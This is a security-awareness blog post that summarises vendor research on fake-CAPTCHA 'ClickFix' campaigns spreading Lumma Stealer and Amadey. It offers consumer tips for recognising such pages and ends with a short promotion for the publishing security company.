You’re probably used to seeing CAPTCHAs (Completely Automated Public Turing Test to Tell Computers and Humans Apart) when websites ask you to “prove you’re not a robot” by clicking on images or typing words.
However, cybercriminals are now creating fake CAPTCHAs that look just like the real thing. When you interact with these fake CAPTCHAs, they can secretly install malware on your computer without you realizing it.
This trend has been growing. Learn how security researchers have discovered this campaign spanning August to October.
How Fake CAPTCHAs Are Used In Malware Attacks
In August 2024, Palo Alto Networks’ Unit 2 found fake verification pages being used to spread the Lumma Stealer malware. McAfee Labs backed this discovery when they found that attackers were using the ClickFix infection chain campaign. This campaign dupes users into clicking buttons like “Verify you are a human” or “I am not a robot.”
When they click, a harmful script is copied to their clipboard. The user is then misled into pasting it by pressing the Windows key + R (which opens the Run command window in Windows), which unknowingly installs the malware.
This attack uses two main methods to lure victims to the fake CAPTCHA pages as per McAfee.
- Cracked Game Downloads: Users trying to download pirated games are redirected to these malicious CAPTCHA pages.
- Phishing Emails: Attackers send fake emails, often to GitHub contributors, about a supposed “security vulnerability.” These emails link to the same fake CAPTCHA pages, making it easy for the malware to spread.
However, according to the Kaspersky report, the fake CAPTCHA pages don’t only spread Lumma Stealer malware; they also distribute the Amadey Trojan.
Kaspersky noted that the ad network pushing these fake CAPTCHAs combines legitimate ads with malicious ones.
Here’s how it works: clicking anywhere on a page that uses this ad network may send you to other sites. Most of these redirects are harmless, leading to ads for security software or ad blockers. But sometimes, the redirect takes you to a fake CAPTCHA page. Unlike real CAPTCHAs that block bots, this fake one is meant to push shady sites. You won’t always end up with malware, though; sometimes, you might just be directed to a betting site via a QR code.
Users in Brazil, Spain, Italy, and Russia were targeted the most in this campaign.
How To Recognize A Fake CAPTCHA & Protect Your Devices
Between September 22 and October 14, 2024, more than 140,000 users encountered ad scripts. Kaspersky’s data shows that over 20,000 of these users were redirected to infected sites, where some saw a fake update notice or a fake CAPTCHA.
Here’s how to recognize a fake CAPTCHA and keep your devices secure:
1. If A CAPTCHA Appears Unexpected
A CAPTCHA should usually appear only on trusted websites and when there’s a valid reason to verify that you’re human. Fake CAPTCHAs might look slightly off—they could have unusual text, odd design, or seem overly urgent that pushes you to click quickly.
2. If A CAPTCHA Or Alert Asks You To Download Something Or Copy & Paste A Command
Avoid it! Real CAPTCHAs never ask you to take these actions. Malware attacks often work by getting you to download a file or paste a script, which then infects your device.
3. If You See CAPTCHAs On These Types Of Sites
Many fake CAPTCHAs pop up on sites that offer free downloads, like cracked games, free movies, or other pirated content. They also show up on some adult sites, file-sharing platforms, and betting websites.
4. If You Accidentally Click On A Fake CAPTCHA
Reliable security software can catch these fake CAPTCHAs and block dangerous sites. Programs like anti-malware tools can protect you if you accidentally click on a fake CAPTCHA or download something malicious.
5. If You See An Update Message That Looks Suspicious
Don’t click it! Attackers sometimes display fake update messages for your browser or other software. Genuine updates don’t appear randomly; they usually come from within your app or software and not as pop-up windows on unrelated websites.
Taking a few extra seconds to question suspicious CAPTCHAs can protect your device and your information.
FAQ
What Are CAPTCHAs Really Used For?
CAPTCHAs are used to make sure you’re a real person and not a bot. They help protect websites from spam and automated attacks by asking you to complete simple tasks, like identifying pictures or typing words. This keeps the site safe and ensures only humans can access certain features.
Who Is Responsible For The Fake Captchas Malware Attack?
Researchers have not yet identified the specific group responsible for the fake CAPTCHA malware attacks. These attacks are part of a campaign where cybercriminals trick users into executing malicious scripts by disguising them as CAPTCHA verification processes. It primarily spreads through fake CAPTCHA pages linked to cracked software downloads and phishing emails.
How to Protect Yourself from Malware Attacks Using Fake CAPTCHAs
Be cautious when prompted to click or download anything from unfamiliar websites. Always double-check the legitimacy of CAPTCHA requests, especially on sites where they’re unexpected. 2Secure Corp can help businesses by offering real-time monitoring, web application security, and advanced protection to stop malware before it reaches your devices.
Source:
- Labs, M. (2024, September 20). Behind the CAPTCHA: A Clever Gateway of Malware | McAfee Blog. McAfee Blog. https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/
- Kolesnikov, V. (2024, October 29). Lumma/Amadey: fake CAPTCHAs want to know if you’re human. Securelist.com; Kaspersky. https://securelist.com/fake-captcha-delivers-lumma-amadey/114312/
- PaloAltoNetworks. (2024). Unit42-timely-threat-intel/2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt at main · PaloAltoNetworks/Unit42-timely-threat-intel. GitHub. https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt